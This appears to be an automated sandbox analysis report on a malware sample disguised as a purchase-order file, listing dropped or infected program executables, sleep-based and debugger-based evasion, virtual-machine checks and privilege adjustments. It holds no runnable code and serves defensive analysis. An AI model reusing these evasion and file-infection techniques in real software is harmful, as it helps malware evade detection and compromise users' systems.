Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_8-21794
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_8-22132

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_26-5758
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_27-5727
Source: C:\Windows\System32\FXSSVC.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_20-5706
Source: C:\Windows\System32\AppVClient.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_15-5631
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_34-22527

Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe

API coverage: 9.2 %

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe TID: 7732	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep count: 4794 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000	Thread sleep count: 325 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe TID: 7208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe TID: 1860	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7384	Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 1908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040	Thread sleep count: 2303 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2536	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe TID: 8028	Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe TID: 8044	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe TID: 8032	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8132	Thread sleep time: -59040000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8132	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 60000

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.00000000012A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: Microsofts.exe, 00000013.00000002.2945501820.0000000000792000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1805369474.0000000006AA3000.00000004.00000020.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1805369474.0000000006AAA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1751167364.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1769440706.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2061282254.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1812669200.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2508497113.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2321199892.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2319647398.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2301823997.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: alg.exe, 0000000B.00000003.2043821981.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2334108033.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2404953266.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPy]%SystemRoot%\system32\mswsock.dll
Source: AppVClient.exe, 0000000F.00000003.1739183245.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000002.1740187584.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1739103187.000000000049F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: zeXKjViL.exe, 00000022.00000002.1998728250.0000000001192000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`%

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

API call chain: ExitProcess graph end node

graph_8-22134

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe

Code function: 19_2_0245C168 LdrInitializeThunk,LdrInitializeThunk,

19_2_0245C168

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Code function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

8_2_0040CE09

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

8_2_004019F0

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

8_2_004019F0

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_004A0994 mov eax, dword ptr fs:[00000030h]	8_2_004A0994
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BD1130 mov eax, dword ptr fs:[00000030h]	8_2_02BD1130
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02C13F3D mov eax, dword ptr fs:[00000030h]	8_2_02C13F3D

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Code function: 8_2_0040ADB0 GetProcessHeap,HeapFree,

8_2_0040ADB0

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0040CE09
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0040E61C
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00416F6A
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_004123F1 SetUnhandledExceptionFilter,	8_2_004123F1
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02C11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_02C11361
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02C14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_02C14C7B

